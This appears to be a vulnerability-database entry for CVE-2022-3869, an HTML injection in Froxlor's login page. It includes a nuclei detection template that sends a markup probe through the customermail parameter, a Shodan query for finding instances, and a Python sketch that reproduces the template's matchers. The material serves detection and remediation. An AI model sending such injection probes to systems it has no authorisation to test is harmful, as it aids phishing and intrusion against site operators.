| Title | Published | Reporter |
|---|---|---|
| Html Injection Reflected in Login Page | 4 Nov 2022 10:30 | huntr |
| CVE-2022-3869 | 6 Nov 2022 06:07 | circl |
| Froxlor cross-site scripting vulnerability | 5 Nov 2022 00:00 | cnnvd |
| CVE-2022-3869 | 5 Nov 2022 00:00 | cve |
| CVE-2022-3869 Code Injection in froxlor/froxlor | 5 Nov 2022 00:00 | cvelist |
| Froxlor vulnerable to code injection | 5 Nov 2022 19:00 | github |
| CVE-2022-3869 | 5 Nov 2022 14:15 | nvd |
| CVE-2022-3869 Code Injection in froxlor/froxlor | 5 Nov 2022 00:00 | osv |
| GHSA-6RJV-XXGR-V57X Froxlor vulnerable to code injection | 5 Nov 2022 19:00 | osv |
| Code injection | 5 Nov 2022 14:15 | prion |
```yaml
id: CVE-2022-3869

info:
  name: Froxlor < 0.10.38.2 - HTML Injection
  author: ctflearner
  severity: medium
  description: |
    HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
  impact: |
    Attackers can inject arbitrary HTML content through the customermail parameter, potentially displaying fake content to users and facilitating phishing attacks against Froxlor administrators.
  remediation: |
    Update Froxlor to version 0.10.38.2 or later that properly sanitizes the customermail parameter and encodes HTML output.
  reference:
    - https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3869
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3869
    cwe-id: CWE-79
    epss-score: 0.01265
    epss-percentile: 0.66169
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Froxlor"
    product: froxlor
  tags: cve2022,cve,froxlor,html,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'The message to ""><h2>TEST</h2>" failed'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b5d8df02c76601b97dff4e29eb8f1c2d17a011d2a3e2417d95cd4b1161c9c6a102202c640a318dde7c22483fadaab524b33cf2e86d2709ccb2d62d1b5cb4f2696e04:922c64590222798bb761d5b6d8e72950
```
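The template above only reports a hit when all three matchers agree. The following added example (not code from the Vulners page, the nuclei project or Froxlor) re-implements that matcher logic in Python and runs it over constructed responses, so a defender can see why an instance that HTML-encodes the reflected `customermail` value stops matching; the `Response` class, the sample bodies and the use of `html.escape` to model the patched output are assumptions for illustration.

```python
import html
from dataclasses import dataclass

# Payload and body string taken from the template; the body word is the raw,
# unencoded reflection of the customermail value inside the error message.
PAYLOAD = '"><h2>TEST</h2>'
EXPECTED_BODY_WORD = f'The message to "{PAYLOAD}" failed'


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (assumption, not a nuclei type)."""
    status: int
    headers: dict
    body: str


def matcher_body_word(resp: Response) -> bool:
    """type: word, part: body -- the raw payload must appear verbatim."""
    return EXPECTED_BODY_WORD in resp.body


def matcher_header_word(resp: Response) -> bool:
    """type: word, part: header -- approximates nuclei matching on the serialized header block."""
    header_blob = "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    return "text/html" in header_blob


def matcher_status(resp: Response) -> bool:
    """type: status -- HTTP 200 only."""
    return resp.status == 200


def template_matches(resp: Response) -> bool:
    """matchers-condition: and -- every matcher has to hit."""
    return all(m(resp) for m in (matcher_body_word, matcher_header_word, matcher_status))


# Constructed sample responses (not captured from any real host).
HTML = {"Content-Type": "text/html; charset=UTF-8"}
VULNERABLE = Response(200, HTML, f'<div class="alert">The message to "{PAYLOAD}" failed</div>')
# Modelled patched output: the reflected value is HTML-encoded, so no markup is injected.
PATCHED = Response(200, HTML,
                   f'<div class="alert">The message to "{html.escape(PAYLOAD, quote=True)}" failed</div>')
# Same reflection but served as JSON: the header matcher does not hit, so no finding.
NOT_HTML = Response(200, {"Content-Type": "application/json"}, EXPECTED_BODY_WORD)
```

Because the condition is `and`, a false positive needs all three signals at once; the encoded reflection in `PATCHED` is exactly what the remediation text asks for.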